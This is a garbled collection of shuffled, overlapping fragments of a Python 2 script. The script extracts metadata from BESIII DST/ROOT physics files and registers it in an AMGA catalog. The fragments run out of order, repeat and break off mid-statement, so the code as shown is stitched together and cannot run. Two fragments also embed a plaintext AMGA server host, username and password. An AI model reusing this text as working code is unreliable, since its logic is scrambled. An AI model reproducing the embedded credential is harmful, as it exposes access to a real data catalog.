"attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling",
"includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in",
"evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version",
"Flase for item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance'])",
"[] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not",
"print \"serveral resonance:\",resList return False #only including one expNum if len(expNumList) == 1:",
"= {} items = lfn.split(\"_\") if type == \"all\": if items[2] == \"All\":",
"i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set",
"the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several",
"if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn",
"getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if",
"Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"]",
"flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get",
"[] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog",
"lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by",
"getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is stored in eventTypeList",
"eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s",
"= checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete",
"function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL",
"\"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with",
"else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3])",
"commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get",
"= format.search(expNum) if res is not None: return res.group() #Get expNum and resonance",
"isn't in expNumList #add this expNum to expNumList if result[3] not in expNumList:",
"#store all attributes attributes = {} expRes = {} runIds = [] #change",
"if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in",
"null #null <=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] =",
"has something wrong to this file print \"serveral resonance:\",resList return False #only including",
"are null #-1 <=> value of status is null #-1 <=> value of",
"attributes = {} expRes = {} lfnInfo = {} runIds = [] #change",
"def getExpRes(runids): entries = [] expRes = {} expNumList = [] resList =",
"filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in",
"of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of",
"if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance",
"= getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling getLFN",
"= items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result",
"== lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in",
"file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag =",
"of this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize",
"#get filesize by calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"]",
"checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile)",
"a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style",
"gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId())",
"%d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst",
"items = lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId =",
"#split runIds according ',' items=runIds.split(',') #members' style in items is string,we need to",
"of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return",
"resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be",
"createBesDir first\" return Flase for item in entries: #for each entry,get its attributes",
"of streamId is null #null <=> value of Description is null attributes[\"status\"] =",
"in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename",
"import re import time #get number behiend string \"exp\" def getNum(expNum): format =",
"string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm and runto",
"EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\")",
"changeFormat #function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag",
"resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes = {}",
"entry in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare",
"is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according",
"%d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is %d,in jobOptions is",
"res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries =",
"of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null'",
"result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL =",
"is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL = runH =",
"a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2",
"need to use changeFormat #function to create a .root link for .dst file",
"lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return",
"False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format",
"#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0]",
"os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like",
"use changeFormat #function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]):",
"if list is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split",
"ExpSearch according runids def getExpRes(runids): entries = [] expRes = {} expNumList =",
"each entry if eventType == result[0]: return True return False #judge format of",
"return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has",
"i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry",
"runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if",
"= {} runIds = [] #change the .dst file to .root file rootfile",
"num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get",
"their style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"]",
"mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str =",
"str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None:",
"expNumList #add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance",
"0 #print \"file\",file for format in srcformat: #if format of file is in",
"null #-1 <=> value of streamId is null #null <=> value of Description",
"run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule, #file name",
"<=> value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"]",
"in srcformat if file.endswith(format): flag = 1 return flag #Before reading information from",
"length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn",
"else: print \"Error %s:in the filename,runL = runH = %d,but runId in the",
"#!/usr/bin/env python # -*- coding:utf-8 -*- # author: linlei #for data/all name of",
"in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"] =",
"items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get",
"#compare runid of rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"])",
"attribute status #-1 <=> value of status is null attributes[\"status\"] = -1 del",
"expRes #check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries",
"result = client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto",
"%s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from",
"= lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True:",
"like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in items",
"#get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum)",
"== \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] =",
"including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including",
"== True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is",
"attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"])",
"rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these values",
"\",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag =",
"getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return",
"expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine",
"string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList",
"if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile",
"= string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {}",
"is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get them from",
"for expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] =",
"runid whether between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if",
"\"error\" #set values of attribute status,streamId,Description #and these values are null #-1 <=>",
"= str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether",
"#lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\")",
"result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in",
"bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def",
"this id isn't in resonance List,add it to resList if result[4] not in",
"expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum",
"information from .root file,we need to use changeFormat #function to create a .root",
"srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file",
"JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile",
"item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result =",
"directory is empty, please run createBesDir first\" return Flase for item in entries:",
"\"Can't get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"]",
"evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error",
"print \"ExpSearch directory is empty, please run createBesDir first\" return Flase for item",
"getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling getLFN function",
"expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList)",
"runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this",
"attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes =",
"resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0]",
"entry = client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE'])",
"get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"]",
"run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type",
"file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return",
"is same as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"]",
"size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def",
"+ \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is",
"getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"])",
"expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str",
"= items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] =",
"filesize by calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] =",
"attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time",
"is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\":",
"TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i",
"if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has",
"getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"]",
"file,we need to use changeFormat #function to create a .root link for .dst",
"= res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list",
"runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat",
"gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1",
"= [] expRes = {} expNumList = [] resList = [] #print\"runids\",runids client",
"only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also",
"data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new",
"entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with",
"= expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else:",
"expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same as resonance that",
"return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn",
"def __str__(self): return repr(\"the File's format is not \",self.format) #type of srcformat is",
"runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] =",
"return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename",
"of attribute status,streamId,Description #and these values are null #-1 <=> value of status",
"runId in filename also is equal to runId in rootfile if attributes[\"runId\"] ==",
"from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance",
"ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile):",
"for item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result",
"delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return",
"entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty,",
"raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile)",
"= changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\"",
"its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print",
"= time.time() print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end",
"#if resonance in filename is same as resonance that get from ExpSearch if",
"if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and",
"author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc,",
"runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if attributes[\"runId\"]",
"client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1])",
"\"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists",
"else: print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\"",
"print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else:",
"in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return",
"= -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return",
"by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH",
"is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and",
"obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start = time.time()",
"and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in",
"result = {} items = lfn.split(\"_\") if type == \"all\": if items[2] ==",
"\"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn",
"splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type == \"all\": if items[2]",
"print \"Error %s:in the filename,runL = runH = %d,but runId in the root",
"str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str = str +",
"dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {} expRes",
"attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of",
"Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del",
"return \"error\" else: print \"Error %s:in the filename,runL = runH = %d,but runId",
"= lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes",
"getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo",
"expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to resList if",
"like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format)",
"in items is string,we need to change their style to integer for i",
"\"error\" else: #this dst file has several runIds,get them from JobOptions by calling",
"into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str",
"as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"]",
"#set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile",
"\"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set",
"return res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries",
"stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')",
"status,streamId,Description #and these values are null #-1 <=> value of status is null",
"res = format.search(expNum) if res is not None: return res.group() #Get expNum and",
"new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def",
"pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get",
"file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr(\"the",
"jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is %d,in",
"import string import re import time #get number behiend string \"exp\" def getNum(expNum):",
"item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in",
"client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is",
"raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split",
"TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get",
"attributes = {} expRes = {} runIds = [] #change the .dst file",
"else: print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\"",
"runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"]",
"of this id isn't in resonance List,add it to resList if result[4] not",
"return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"]",
"this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile",
"return flag #Before reading information from .root file,we need to use changeFormat #function",
"return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile",
"import os import os.path import ROOT from ROOT import gROOT from amga import",
"ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string import re",
"\"Error %s:in the filename,runL = runH = %d,but runId in the root file",
"import time #get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res",
"List,add it to resList if result[4] not in resList: resList.append(result[4]) #only including one",
"expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False:",
"expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"]",
"getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling getLFN function",
"expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print",
"function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType",
"all attributes attributes = {} expRes = {} lfnInfo = {} runIds =",
"runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling",
"filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds)",
"import os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import",
"1 return flag #Before reading information from .root file,we need to use changeFormat",
"list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is string,we need",
"if result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL",
"in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL",
"def getAttributes(self): #store all attributes attributes = {} expRes = {} runIds =",
"format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self):",
"by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile",
"size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0:",
"rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and",
"expRes == False: print \"Can't get expNum and resonance of this file\" return",
"is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2",
"a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0:",
"#Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries = []",
"= \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile",
"\"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] =",
"result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1:",
"commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] =",
"runIds according ',' items=runIds.split(',') #members' style in items is string,we need to change",
"filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description",
"items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return",
"expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] =",
"str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if",
